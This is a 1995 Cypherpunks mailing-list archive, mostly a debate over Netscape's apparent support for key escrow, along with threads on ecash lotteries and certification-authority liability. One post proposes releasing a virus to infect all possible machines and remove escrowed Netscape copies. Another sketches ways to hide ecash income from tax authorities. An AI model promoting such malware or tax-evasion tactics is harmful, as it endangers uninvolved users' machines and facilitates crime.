Subject: e$: Moof! (Hettinga Speaks at Apple)
Message-ID: <199511302342.PAA12808@jobe.shell.portal.com>

On Tue, 28 Nov 1995, Robert Hettinga wrote:

> God help us all.
>
> I've been invited to the CyberDog Coding Retreat next week at Apple
> Computer in Cupertino. Getting flown out there is cool. Hanging with the
> more clueful Mac Internet types and getting to kibitz and watch (I like to
> watch!) them code OpenDoc parts for the internet from 8AM to midnight plus,
> subsisting on Dew and Pizza is really way cool. Even getting some
> mac.cypherpunks in the door to code crypto parts is extremely cool. But...

Mountain Dew and Pizza?? Ohh, waita minutae ... this is California. That means it's probably smoked salmon, with avocado and mayonnaise pizza. Yum.

Seriously though ... I'm green with envy. I'd love to attend something like this, but logistics would be a nightmare. First, I'd have to get clearance from the US government for that. And I think I'm on their "undesirable" list, and would need to get some type of waiver to clear immigration.

Problems, eh??

I tried to call the Consul-General this afternoon, actually to inquire about that and got put on perpetual hold and forced to listen to some long recording.
Then I was told that if I wanted any information at all, I should call a 1-900 number.

A 1-900 number?? Too rich for my blood.

I guess that Foggy Bottom, really is worried about their budget issues, aren't they? I guess they really want me to use my quarter for pretty much everything.

> They've asked me to give a "talk". All by myself. In an auditorium. With an
> audience, I mean. With publicity. I feel like Hoffman in Rain Man...
> V-E-R-N, Verrrn... More to the point, I feel like I'm tempting fate,
> here...

Oh, I hate large groups, unless I have prepared text.

> Sooo. I've been told I can have friends in the audience. That's cool. As
> many friends as I want. That's even cooler. I can even have reinforcements
> up on the rostrum. That's extremely cool.

Cool.

About reinforcements on the rostrum. I know, I really wouldn't inspire any confidence in the audience, at all. I'd probably go off into some strange side track on the nuances of something completely irrelevant and lose the entire audience while talking.

I'm really one of those people that doesn't always have facts, and figures, and symbols readily at hand. It's a cognitive thing. Sort of like a database inquiry.

Alternatively, if I do focus on an issue. YIKES!! My Aunt Danielle always warned me about my tendency to use nuclear weapons when simple artillery would suffice. I tend to come on a "bit" heavy at times, unless I actively self-censor. It really is a constant battle on that front.

> So, while I work on the "reinforcements up on the rostrum" part, *please*
> come and help me explain this stuff to the rest of the Apple community.

I'm really not sure I'd necessarily want to break "bad news" to people, reinforcements or not. I saw this yesterday, at a presentation that I was at. It was horrible, and I wasn't even presenting. I was in the audience -- an invited guest. I sorta kinda pissed on someone's campfire, and after that no-one wanted to talk to me.

Shoot if looks could kill ...
I'd be worried about reputations and popularity, and what this all means "long-term", beyond the time-line of the presentation. I know that explaining some of this might severely limit future opportunities.

I think I read that somewhere recently ... that "consultants with blood on their hatchets" usually don't get very far.

But it's your talk, I guess. Just my $.02.

> Cryptoanarchy. Right here in Cupertino, folks.
>
> See you there...

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From aleph1 at dfw.net Thu Nov 30 17:11:10 1995
From: aleph1 at dfw.net (Aleph One)
Date: Fri, 1 Dec 1995 09:11:10 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID:

On Wed, 29 Nov 1995, sameer wrote:

> http://www.cnet.com/Central/News/govt.html
>
> Bad. Very Bad. And I was almost starting to like Netscape.

Ahh well there goes my respect for netscape too. *sigh* Ahh well guess someone will just have to write a virus to say enhance all escrow equipped versions of netscape that come out. Of course I don't have to point out to netscape we won't buy any escrowed products from them. Hmmm Open Market is starting to look better.
> --
> sameer Voice: 510-601-9777
> Community ConneXion FAX: 510-601-9734
> The Internet Privacy Provider Dialin: 510-658-6376
> http://www.c2.org/ (or login as "guest") sameer at c2.org
>

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

From futplex at pseudonym.com Thu Nov 30 17:12:40 1995
From: futplex at pseudonym.com (Futplex)
Date: Fri, 1 Dec 1995 09:12:40 +0800
Subject: Applied Cryptography Questions
In-Reply-To: <199511300614.HAA08769@utopia.hacktic.nl>
Message-ID: <199511300754.CAA12171@opine.cs.umass.edu>

Anonymous (hence the public reply) writes:
> A couple questions about Applied Cryptography (Second Edition)

I only have the 1st, but I won't consult it for this anyway....

> 1. What on earth is a Neural Net?

This sounds like a troll, since we recently had a thread about the possible use of neural nets in cryptographic applications, and the precise text used in AC2 to discuss this matter. Very roughly, a neural net is an abstract model of a network of neurons in a brain, used in artificial intelligence as a model of computation. I imagine you could easily have found more complete information by doing some trivial net search for "neural net".

> 2. Consider the Chinese Lottery attack vs a processor bank.
>
> ADVANTAGES
> Distributed computing, no easy bombing target.
>
> DISADVANTAGES
> 39% inefficient
> Need specialized hardware [for speed] or transmission of algorithms
> for any specific algorithm
> Not on all the time
> If value(crack) * cracks/chip > cost of chip, then why not have
> the gov buy the chips? It's probably cheaper that way.

Well, is it in fact "probably cheaper" ? If value(crack) > cost(chip) > cost(attack) then the attack makes more sense....

> 4. Does there exist an n such that a keyspace of 2^n is trivial to crack
> [ie a matter of minutes] on a PC but is difficult to crack for a
> big commercial company or even a major government?
> [this question relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]

I think you need to explain more for this question to make sense. Obviously companies (even big ones) and governments (even major ones) could buy and use PCs themselves, in the event that conferred some cryptanalytic advantage.

ObLycos: Hey, better still, let's put the archives in an export-controlled directory. We don't want too many outsiders to hear about the privacy advantages of strong cryptography, now do we ?

ObAlices:

-Futplex
"I look pretty young but I'm just backdated" -The Who

From Greg_Rose at sydney.sterling.com Thu Nov 30 17:16:30 1995
From: Greg_Rose at sydney.sterling.com (Greg Rose)
Date: Fri, 1 Dec 1995 09:16:30 +0800
Subject: Q: Legal liability for Certification Authority
Message-ID:

In the last few weeks, mostly under the subject of creating a Cypherpunks Certification Authority, someone mentioned legal liability of a CA if a certified identity was misused.

I am looking for material to pass on to a REAL, PAID net-savvy lawyer relating to this question. In return for the money we pay him, he will return an opinion on just what liability exposure would be for, say, a large technical users group who got into the CA business for PGP keys. And/or what disclaimers or indemnities would be needed.

I would be happy to make his legal opinion available to the list.

IANAL, so I don't know just what precedents, decisions, regulations, and so on might be relevant. More information is always a good thing.

Please:
1. reply to me by mail, not the list, unless there is more general relevance to Cypherpunks. I'll summarise.
2. Speculation is not useful.

thanks,
Greg.

--
Greg Rose  INTERNET: greg_rose at sydney.sterling.com
Sterling Software  VOICE: +61-2-9975 4777  FAX: +61-2-9975 2921
28 Rodborough Rd.  http://www.sydney.sterling.com:8080/~ggr/
French's Forest  35 0A 79 7D 5E 21 8D 47 E3 53 75 66 AC FB D9 45
NSW 2086 Australia.  co-mod sci.crypt.research, USENIX Director.
From jhupp at novellnet.gensys.com Thu Nov 30 17:28:17 1995
From: jhupp at novellnet.gensys.com (Jeff Hupp)
Date: Fri, 1 Dec 1995 09:28:17 +0800
Subject: Netscape gives in to key escrow
Message-ID: <26C5DB002BF@Novellnet.Gensys.com>

On 30 Nov 95 at 13:30, Timothy C. May wrote:

: At 7:26 PM 11/30/95, Ravi Pandya wrote:
: >If you're looking for an alternative Web browser for Windows, we just made
: >ours available for free at www.netmanage.com. It's fast and reliable, and
: >supports HTML 3.0, inline video, software distribution, VRML (NT version),
: >Real Audio, TrueSpeech, etc.
:
: This shows the price Netscape could pay for taking a pro-surveillance,
: anti-privacy stance.
:

The word is getting out. Both brokers I have system support contracts with have called me asking for my take.

--
JHupp at gensys.com |For PGP Public Key:
http://gensys.com |finger jhupp at gensys.com
Waking a person unnecessarily should not be considered a capital crime. For a first offence, that is

From ses at tipper.oit.unc.edu Thu Nov 30 17:37:53 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Fri, 1 Dec 1995 09:37:53 +0800
Subject: Netscape's Delicate Balancing Act
In-Reply-To:
Message-ID:

If anyone's interested, I'm planning to make up some T-Shirts featuring "The South Bay Url Company".

Simon // Yes, we also do Tulips

---
(defun modexpt (x y n) "computes (x^y) mod n"
  (cond ((= y 0) 1)
        ((= y 1) (mod x n))
        ((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
        (t (mod (* x (modexpt x (1- y) n)) n))))

From loki at obscura.com Thu Nov 30 18:18:05 1995
From: loki at obscura.com (Lance Cottrell)
Date: Fri, 1 Dec 1995 10:18:05 +0800
Subject: Getting a copy of the Jim Clark speech
Message-ID:

If he has not clarified his position by tomorrow evening, I will set up some web pages explaining the situation and decrying Netscape's apparent position on key escrow (GAK). I have the quotes that L. McCarthy posted, and Jeff Weinstein's response.
I have not been able to get the article off the server yet (possibly all the cypherpunks downloading it?). Any other documents I should include?

-Lance

At 1:24 PM 11/30/95, Jim Gillogly wrote:
>> Raph Levien writes:
>> I called Netscape public relations. Here's what I found out:
>
>> 1. Netscape PR does not keep transcripts, etc., of Jim Clark's speeches.
>> 2. You can order a tape of the speech from Conference Copy for...
>
>Good initiative, but we needn't wait for 6 weeks to get a copy of it.
>All that needs to happen is for Jim Clark to explain what he meant, if
>it's different from what was reported. No need for all the to-ing and
>fro-ing.
>
>Perhaps what he meant was simply reiterating the announcement of October
>when they said they'd support the TESSERA crypto API. If it's worse than
>this, he should explain what's going on. If not, October was the time to
>get excited rather than now.
>
>Waiting with bated breath...
>
> Jim Gillogly
> Highday, 10 Foreyule S.R. 1995, 21:24

----------------------------------------------------------
Lance Cottrell loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly
it flips over, pinning you underneath. At night the ice
weasels come."
--Nietzsche
----------------------------------------------------------

From aleph1 at dfw.net Thu Nov 30 19:31:34 1995
From: aleph1 at dfw.net (Aleph One)
Date: Fri, 1 Dec 1995 11:31:34 +0800
Subject: Netscape gives in to key escrow
In-Reply-To: <199511300849.JAA13845@utopia.hacktic.nl>
Message-ID:

On Thu, 30 Nov 1995, Anonymous wrote:

> Aleph One's suggestion -- an NS-hack or "virus" -- doesn't make any
> sense: if Perry or someone would vet a hacked copy, I'd use it in a
> second.
But hacking it would involve a violation of the license, so hacked > versions couldn't be offered in any above-ground way: there'd be no way to > certify a hacked copy with a trusted nym's key. You seem to have missed the point. A "virus" is not there to fix your copy because you want it. It's there because I want it. It would be released so that it infects all possible machines. It would either remove the routines in Netscape that allow escrow or simply remove the offensive copy of Netscape (can't use it if it's not there 8) Violation of the license? Really? Like virus writers give a damn. > Netscape is between a rock and a hard place: I think it's safe to > say that, were all things equal, NS would support strong crypto. The fact > that NS has decided otherwise suggests that some pressure was applied: > Clark says as much. This leads me to believe that one possibly effective > (and possibly dangerous) tactic might lie in a seriously sustained attack > on NS's reputation -- keeping up a meme-drumbeat of "you can't trust > Netscape, that's all, you'll get ripped off." I think we should try it -- > TODAY, now, persistently and loudly, until NS comes around. I'm not saying > that this'll be enough, but it's a start. TODAY. And I really don't care > what it takes: calling cronies in the press, spreading innuendo, redoing > NS icon sets so there's a spy from "Spy Versus Spy" loitering behind the > N... I've seen some nice "NO Netscape" tags on GNU-related pages. Let's do > it. Yes and you must remember the power of the net. As an example remember the heat Microsoft took for the Registration Wizard what all it does is ASK YOU if you would like to submit the recorded information about your computer to Microsoft. It was so blown out of proportion that it even made it to places that would check this kind of stuff like Information Week.
> > Hieronymous > FB DD B5 C8 FB F4 52 41 F0 0F A0 6E 99 43 75 06 > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQBVAwUBML1vc73g0mNE55u1AQGfdgIAsldR3e9UQZG9//38B9LrU/HnCSzaY1kB > RMOcBdab5EZ2X9BXkA7lIdDJUUqHOykuv1oyFDtitWRsXxmaTb0cuw== > =0FmD > -----END PGP SIGNATURE----- > Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From EALLENSMITH at ocelot.Rutgers.EDU Thu Nov 30 20:10:49 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Fri, 1 Dec 1995 12:10:49 +0800 Subject: ecash lottery (Was: ecash casino) Message-ID: <01HY9QKW4BCS8WYZVM@mbcl.rutgers.edu> From: IN%"s1113645 at tesla.cc.uottawa.ca" 30-NOV-1995 00:22:29.15 Isn't there also some Scandinavian bank that's handling ecash? It might be hard to explain to US tax authorities how large amounts of anon currency are ending up in one's marktwain account. In that case it might be ------------------- There are essentially two things that one can do with tax-suspicious ecash (or cash, for that matter). The first is to expend it in non-traceable, non-predictable ways. The second is to disguise it so it looks non-tax-suspicious. The first includes spending, of course. In regards to the non-predictable, I am meaning avoiding spending it for things such as groceries that someone can easily estimate a minimum bound for how much can be spent. Spending it to add quality (such as low-fat foods) to those groceries would be harder to prove. The first also includes charity and investment. Investment does have the problem that the income one gets out will have to then be treated by the same sort of process. The second will vary in method depending on one's individual skills and situation. However, I will note that it will be easier for those with independent earning skills- a self-owned business, for instance.
I will note in regards to the above that while I have been doing some reading on the underground/black economy, I have not actually attempted any of the maneuvers discussed. Thus, what I say should be taken with at least a grain of salt. -Allen From anonymous-remailer at shell.portal.com Thu Nov 30 20:18:42 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 1 Dec 1995 12:18:42 +0800 Subject: Netscape gives in to key escrow Message-ID: <199512010321.TAA09577@jobe.shell.portal.com> On Thu, 30 Nov 1995, Mike McNally wrote: > Jeff Weinstein writes: > > have lots of stuff attributed to Jim, but very little of it is actual > > quotes. > > Well, if there was in fact a speech made from which the pseudo-quotes > in the article were taken, then surely the full text of that speech > will be made available somewhere for clarification. I read this article, and thought it to be quite a twist. It's suicidal from Netscape to say this. It's almost like a couple of stock promotions I was at yesterday at the Calgary Petroleum Club. Horrible nasty stuff. Suicidal speeches. Especially the one guy from Neutrino Resources (an Oil and Gas Company) who decided to explain what a Neutrino was before he started his "spiel" and talking about how great his company was and how cashflow wasn't a good measure of a company's worth. Netscape could well learn from that. (Unfortunately, I doubt that anyone was there.) People in these audiences DO listen. Press, investment analysts, and the like who do pepper the audience didn't all just fall off the turnip truck. Jim Clark, should have seen or heard this. If he did, then he might be a bit more careful with what he says ... but then again, I'm not sure how involved he is in daily operations. But nothing that Netscape does any longer surprises this writer ... look at how they handled the revelation back on Friday, October Thirteenth that the emperor's product had no clothes. 
Did they respond to the claims?? No. All they did was spam this list with noise "unofficially, not speaking for the company, but I work for Netscape" noise, and then continued distributing their product. Maybe these revelations will help to get the Netscape product pulled from people's machines, but I'm not gonna hold my breath on that one. The momentum which is behind their stock and product promotion now has a life of its own. Stopping Netscape (and the stock from advancing) is like trying to stop a steam-roller. But for now, I'm busy setting up an email account to allow people to send replies to me, and to settle this "reputation" stuff once and for all. I should be back to posting very soon. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | > | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > From EALLENSMITH at ocelot.Rutgers.EDU Thu Nov 30 20:29:13 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Fri, 1 Dec 1995 12:29:13 +0800 Subject: Getting a copy of the Jim Clark speech Message-ID: <01HY9R3NKBII8WYZVM@mbcl.rutgers.edu> From: IN%"loki at obscura.com" 30-NOV-1995 21:12:15.86 If he has not clarified his position by tomorrow evening, I will set up some web pages explaining the situation and decrying Netscape's apparent position on key escrow (GAK). I have the quotes that L. McCarthy posted, and Jeff Weinstein's response. I have not been able to get the article off the server yet (possible all the cypherpunks downloading it?). Any other documents I should include? --------- I would suggest being sure to include some links to the EFF archives in regards to Clipper, etcetera. 
These should make it clear that it isn't just one group opposing the idea of GAK, but a wide coalition. -Allen From crypto at midex.com Thu Nov 30 20:30:29 1995 From: crypto at midex.com (Matt Miszewski) Date: Fri, 1 Dec 1995 12:30:29 +0800 Subject: Netscape gives in to key escrow In-Reply-To: <199511301616.IAA18452@infinity.c2.org> Message-ID: On Thu, 30 Nov 1995, sameer wrote: > Jeff: If Netscape comes out in favor of GAK, will you leave? > (Wait until February, at least, of course..) You don't have to answer > that to me, or the list, just think about it, and answer it for > yourself. Do you think "anyone else" there would leave, as you say > below that they don't want to go down history, etc... > While this would go over well in the press if handled right please let everyone remember that Jeff is a real person with bills to pay and food to put on at least his own table. Now if someone out there with their own business is willing to match his politics with his purse and offer Jeff a job at the same level if he *decides* to leave in the midst of GAK flak... > > -- > sameer Voice: 510-601-9777 > Community ConneXion FAX: 510-601-9734 > The Internet Privacy Provider Dialin: 510-658-6376 > http://www.c2.org/ (or login as "guest") sameer at c2.org > Matt From anonymous-remailer at shell.portal.com Thu Nov 30 20:35:26 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 1 Dec 1995 12:35:26 +0800 Subject: Netscape gives in to key escrow Message-ID: <199512010335.TAA10408@jobe.shell.portal.com> On Thu, 30 Nov 1995, Jay Holovacs wrote: > On Thu, 30 Nov 1995, Timothy C. May wrote: > > > Can Netscape continue to prosper? This latest issue won't kill it, > > I suspect this will unfortunately help. Stockholders are interested in > profits, not principles. Uhhm, I think that that depends on what "class" of stockholder you're speaking of. 
The short term "trader" whose idea of a long-term investment is the one that gives a decent return by lunchtime, or the one who wants to buy a good company, make a solid investment, and put their stock away for five years, knowing that their capital is being put to good use. They really are different players with different approaches. Netscape stock as an example has lots of momentum ... it's in a feeding frenzy. And I'm pretty sure that someone with "very" deep pockets -- possibly even someone who's got their own printing press -- is busily buying everything in sight, and crossing trades on every up-tick. (Disclaimer: Just my opinion, not speaking officially in any capacity.) I'm not sure who might be behind any of this, though. I haven't the desktop power, nor the data or tool-set to chart and flow-analyze the trading record, and see what the play is. I wouldn't really be surprised though if it was offshore interests who want to "cash-in" on high-tech. Standard "Von Clausewitz" reader-types. People who subscribe to "Von Clausewitz's" principles on "other means". I base this assessment purely on price-movement, and on the "known" fundamentals. To this writer, it's pretty transparent. In the last six-weeks, Netscape has gone from the 60's to flirting with 150. That's one heck of a trend-line that some pseudo-technical floor-trader types will jump on. Part of that is "market-forces", and part of that is definitely "market-makers". The only way to counteract that is probably some Elliott Wave Theory shakeout, or something similar. It's the only way to stop 'em from blowing up the balloon. Or you need one killer scandal. Cheap advice, btw ... it's free ... and no-one even had to buy me a Gin & Tonic, or some fancy canapes to hear it. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E.
From fstuart at vetmed.auburn.edu Thu Nov 30 20:36:30 1995 From: fstuart at vetmed.auburn.edu (Frank Stuart) Date: Fri, 1 Dec 1995 12:36:30 +0800 Subject: Getting a copy of the Jim Clark speech Message-ID: <199512010343.VAA26254@snoopy.vetmed.auburn.edu> >If he has not clarified his position by tomorrow evening, I will set up some >web pages explaining the situation and decrying Netscape's apparent >position on key escrow (GAK). I have the quotes that L. McCarthy posted, >and Jeff Weinstein's response. I have not been able to get the article off >the server yet (possible all the cypherpunks downloading it?). Any other >documents I should include? I'm working on an "obnoxify" program to convert normal html documents into documents that look normal to non-netscape browsers, but are too painful to read with netscape (, , etc.). I think tomorrow evening would be a good time to decide whether or not to distribute it. | (Douglas) Hofstadter's Law: Frank Stuart | It always takes longer than you expect, even fstuart at vetmed.auburn.edu | when you take into account Hofstadter's Law. From adam at lighthouse.homeport.org Thu Nov 30 20:47:27 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Fri, 1 Dec 1995 12:47:27 +0800 Subject: Netscape gives in to key escrow In-Reply-To: Message-ID: <199512010307.WAA18467@homeport.org> Jay Holovacs wrote: | On Thu, 30 Nov 1995, Timothy C. May wrote: | > Can Netscape continue to prosper? This latest issue won't kill it, | | I suspect this will unfortunately help. Stockholders are interested in | profits, not principles. Co-oping with the feds will help Netscape get to | the commercial market sooner, and most customers, sadly don't give a damn | about privacy (or don't understand). That's very true. We should look at what stockholders tend to care about (although, in the case of many internet stocks, it does seem to be 'a bigger fool'). One thing that stockholders do care about is liability.
It's my (non lawyerly) opinion that anyone implementing GAK without a government mandate to do so is opening themselves up to huge liability if the Clipper database of keys gets out. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From rah at shipwright.com Thu Nov 30 20:52:47 1995 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 1 Dec 1995 12:52:47 +0800 Subject: (fwd) ECheques Message-ID: --- begin forwarded text From: "John Hemming CEO MarketNet" Date: Thu, 30 Nov 1995 17:11:34 PM PST To: www-buyinfo at allegra.att.com Mime-Version: 1.0 Subject: ECheques We have just had the final modifications of the documentation from our Lawyers to make the UK Sterling Clearing ECheque system fully live. If you want to peruse the process http://mkn.co.uk/bank - about opening accounts http://mkn.co.uk/help/bank/register - account contract http://mkn.co.uk/help/bank/regkey - registering each key mandate We do intend putting some form of PGP signature checking facility in for clearing ECheques later, but for the moment the standard ECheque form generated by WorkHorse is what we accept. The Standard ECheque is nothing more than a BER encoded sequence similar to a certificate request with a standard PKCS signature at the end of it which is then Base64 encoded (but if you use the decoding facilities in WorkHorse you can see this). Britain .... first again. We did clear an ECheque in September, but this is now the real McCoy. Merchant accounts cost nothing to open and the transactional charge for a Merchant to receive Sterling (not ecash denominated in Sterling) is 1%. The accounts can be reviewed online and they are real bank accounts (in Sterling however). Other Merchant transactions are costed as usual see conditions (eg 40p per cheque - paper cheque).
If you want to integrate ECheques and the web simply see our flower ordering form http://mkn.co.uk/load/ordflow John --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From stewarts at ix.netcom.com Thu Nov 30 20:53:05 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 1 Dec 1995 12:53:05 +0800 Subject: ecash lottery (Was: ecash casino) Message-ID: <199512010309.TAA10065@ix4.ix.netcom.com> Ian wrote: >>The idea behind my proposal was that any participant can determine if he has >>won. The winning number (a hash of which was published beforehand, as in >>a "bit commitment" scheme) is announced. Anyone who picked a number >>that, say, matched in the last digit, wins $2. If you matched the >>last two digits, you win $10, etc. The house (without sacrificing >>reputation) can't arrange who the big payoffs will go to, nor can it >>(as I think Tim suggested) give out lots of small prizes and no big ones. >There are two main kinds of lotteries - systems where many people have a >moderate chance of winning a fixed amount of money, and lotto-systems where the winners split a jackpot that's based on current and/or previous players' losses\\\\\\ ticket purchases. The former kind, such as numbers games, works because the expected payoff is less than the ticket price - you can make it honest through techniques like bit commitment, but as Tim points out, the kind of people who care about things like bit commitment know enough math to know these games are money-losers. Perhaps you can attract some people with a flashy user interface, but it's not like really being in Vegas with booze and babes and blinkenlights and incessant noise and stale smoke and Siegfried and Roy's tiger act.
On the other hand, lotto systems are too easy to cheat with anonymous payees. Sure, you can make sure that any genuine winners get paid, but you can also throw in the occasional ringer to share the prize, and nobody can tell unless you do it often enough that people start checking the probabilities. Bit commitment doesn't prevent this kind of cheating; it just verifies that you knew the number in advance (oops :-). You need some sort of externally verifiable source of random numbers; an MD5 hash of the Wall Street Journal stock price web page from a few hours after the last bet and digital timestamping or something might be good enough. (Of course, a single unified stock price page becomes even less meaningful with large volumes of on-line anonymous private stock trading.) (The pre-digital version of this scam was to hire some poor old grandma from the South Bronx as the shill, since nobody'd accuse Granny of conspiring with the mob. It wasn't really enough then, and now Granny may be using anonymous digicash for her payoffs...) Another way to cheat progressive lotto systems is to not report all your ticket sales each week, since anonymity makes it excessively hard to verify. Committing to the list of all the numbers bet almost works, but you could still skim a few percent by reporting smaller sales of popularly chosen numbers, with the risk that you've occasionally got to pay all six real winners 1/5 of the jackpot if you're unlucky. You can't get around this by using large enough numbers that there's a small probability of duplication, because that also reduces the probability of a win too far, and because some folks are going to pick 7777777...777 regardless of how many bits long their bet is. Government lotteries are surprisingly free from this sort of problem.
Not because governments are excessively honest, of course :-) Employee pay isn't generally dependent on profitability, there's enough public scrutiny that it's harder for employees to cheat for their own gain (rather than their lotto organizations'), and (perhaps most important) they're already taking such an appallingly high cut of the winnings that there's no need for regular cheating - it's one of the efficiencies possible in a highly unnatural monopoly. But if all else fails, you might be able to talk Scott Adams into giving you the World Wide Web franchise for Dogbert's Value-Priced Lottery Tickets.. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From llurch at networking.stanford.edu Thu Nov 30 22:04:23 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Fri, 1 Dec 1995 14:04:23 +0800 Subject: Netscape 2.0b2 allows for invasion of privacy (fwd) In-Reply-To: Message-ID: [As seen on the cypherpunks list] I just confirmed this for Mozilla/2.0b3 (Win95; I). I also see an entry from the Mac version of 2.0b3. No need for anyone else to test it. Very nasty indeed. To what other variables might someone have access? Scott is probably going to be responsible for a good bit of the traffic on the trans-pacific cables tomorrow :-) -rich From jamesd at echeque.com Thu Nov 30 22:09:44 1995 From: jamesd at echeque.com (James A. Donald) Date: Fri, 1 Dec 1995 14:09:44 +0800 Subject: WTO an even worse possibility as Inet regulator Message-ID: <199512010519.VAA12922@blob.best.net> At 08:40 PM 11/30/95 +0000, attila wrote: > but WTO is also accumulating a rather larger > bureaucracy and is challenging Uncle Sam on several major unilateral > actions. [...] and it will be by the WTOs and world courts, or the > Rockefeller NWO --read UN, and UN troops in America. This is excessively paranoid: The main threat to freedom is still internal, rather than external.
The major expansion of WTO power came because of the notorious corruption and one sidedness of American courts judging disputes between foreign and American businessmen. Since WTO courts do not have WTO gunmen this amounts to a major separation of judicial and executive power, thus though it is a centralizing move, it is also a move that favors liberty and the rule of law. Of course the first stages in centralization always do, at first, favor liberty and the rule of law as they restrain corrupt and lawless local powers. Later, much later, the centralized power becomes a greater threat to liberty than those local authorities that it restrained. That stage is still a long way down the track, and very likely the modern nation state will collapse first. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From tcmay at got.net Thu Nov 30 22:12:32 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 1 Dec 1995 14:12:32 +0800 Subject: Netscape, Corporations, and GAK Support Message-ID: The firestorm of criticisms of Netscape and Jim Clark over his apparent support for mandated key escrow (GAK, "Government Access to Keys," Carl Ellison) raises some issues: 1. To what extent is the government and its supporters of GAK applying pressure to corporations and/or giving them private briefings on security issues? (Recall the infamous "If you knew what I knew, you'd support Clipper" sorts of comments from people who'd apparently been glimpses of the Four Horsemen riding in.) 2.
What is the appropriate response for folks like us when it becomes apparent that a corporation with a tremendous influence on future directions in security and privacy (examples being both Microsoft and Netscape) have apparently been jaw-boned in private on security issues? (I tend to use "apparently" and "ostensibly" a lot, as you've probably noticed. It's my way of signalling some uncertainty. The history of GAK has indicated to me that discussions are happening in private with CEOs and suchlike, else why or how could some of the public comments come out the way they do? But I don't know this for a fact--a side effect of private channels, ironically--so I can only call 'em as I "apparently" see 'em.) Supporters of corporations, motivated by a range of reasons, often ask critics to "hold off" on criticisms until firmer statements of policy are made, or until actual products are introduced. Alas, this is a bad strategy for us to follow. The very nature of the behind-the-scenes maneuvering, and the long lead times for products, means that we must be alert for "early warning signals" of impending GAK and other totalitarian measures. I personally believe that the government supporters of mandated key escrow and other restrictions on the use of encryption have looked at the explosive growth of the Web in general and of Netscape in particular and are *frantically* looking for ways to get a handle on the issues that motivate them. As others have speculated, putting GAK into every Netscape _server_ would have certain advantages, and I would be very surprised indeed if NSA/NIST/Denning have not been thinking about this issue. (Ray Cromwell says it can be skirted...I don't doubt this, just as superencryption can skirt GAK in machine-to-machine e-mail. But this doesn't mean that we should just ignore signs that GAK may be built into Netscape, or other products.)
It's possible that Jim Clark--whose quotations I have not yet seen denied by Netscape--is merely naive on matters of mandated key escrow. It's possible that he hasn't given it much thought. It's also possible that he sincerely is supportive of plans for Big Brother to have an "escrowed" copy of our conversations, diaries, travel plans, etc. I don't know, and I hope we soon hear more from Jim Clark on this issue. But I will always think it appropriate to listen carefully for evidence that a company plans to help build the Surveillance State, and to act in response to such evidence. The stakes are just too high to "wait for an actual product" before speaking out. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From adam at lighthouse.homeport.org Thu Nov 30 22:20:08 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Fri, 1 Dec 1995 14:20:08 +0800 Subject: Netscape 2.0b2 allows for invasion of privacy (fwd) In-Reply-To: Message-ID: <199512010605.BAA18775@homeport.org> About a month ago, I made the argument that Java, despite its imperfections, is much better than most things we'll see. I stand by this argument, and urge Netscape to use only Java* as a scripting language. *By Java, I mean the class of languages designed with security in mind. I think that means Java and Safe-TCL. Taint-perl is not useful; it's designed for unsafe input from a user, not unsafe code.
